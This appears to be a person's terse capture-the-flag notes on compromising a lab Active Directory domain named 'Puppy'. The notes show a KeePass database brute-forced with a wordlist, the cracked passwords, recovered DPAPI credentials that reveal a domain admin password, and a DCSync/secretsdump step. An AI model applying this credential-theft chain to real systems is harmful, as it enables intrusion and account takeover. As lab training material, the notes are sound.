adam.silver is prob the user I have to get

ant.edwards also too maybe both are remote mgm users

steph.cooper_adm@PUPPY.HTB ← this guy has domain admin

dump keepass database

./bin/python3 bfkeepass.py -d /home/ew/box/puppy/loot/recovery.kdbx -w /home/ew/Documents/wordlists/rockyou.txt -o
[] Running bfkeepass
[] Starting bruteforce process…
[!] Success! Database password: liverpool
[>] Dumping entries…

[>] Title: JAMIE WILLIAMSON
[>] Username: None
[>] Password: JamieLove2025!
[>] URL: puppy.htb
[>] Notes: None

[>] Title: ADAM SILVER
[>] Username: None
[>] Password: HJKL2025!
[>] URL: puppy.htb
[>] Notes: None

[>] Title: ANTONY C. EDWARDS
[>] Username: None
[>] Password: Antman2025!
[>] URL: puppy.htb
[>] Notes: None

[>] Title: STEVE TUCKER
[>] Username: None
[>] Password: Steve2025!
[>] URL: puppy.htb
[>] Notes: None

[>] Title: SAMUEL BLAKE
[>] Username: None
[>] Password: ILY2025!
[>] URL: puppy.htb
[>] Notes: None

[>] Entry dump complete.
[] Stopping bruteforce process.
[] Done.

credentials that worked

ant.edwards Antman2025!

[>] Title: ANTONY C. EDWARDS
[>] Username: None
[>] Password: Antman2025!
[>] URL: puppy.htb
[>] Notes: None

found this in the backup file:
cn=steph.cooper,dc=puppy,dc=htb
ChefSteph2025!

to show all files in a folder: dir -Force

got this from dpapi → credential files
[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=PUPPY.HTB
Description :
Unknown :
Username : steph.cooper_adm
Unknown : FivethChipOnItsWay2025!

secretsdump steph.cooper_adm has DCSync permission on domain
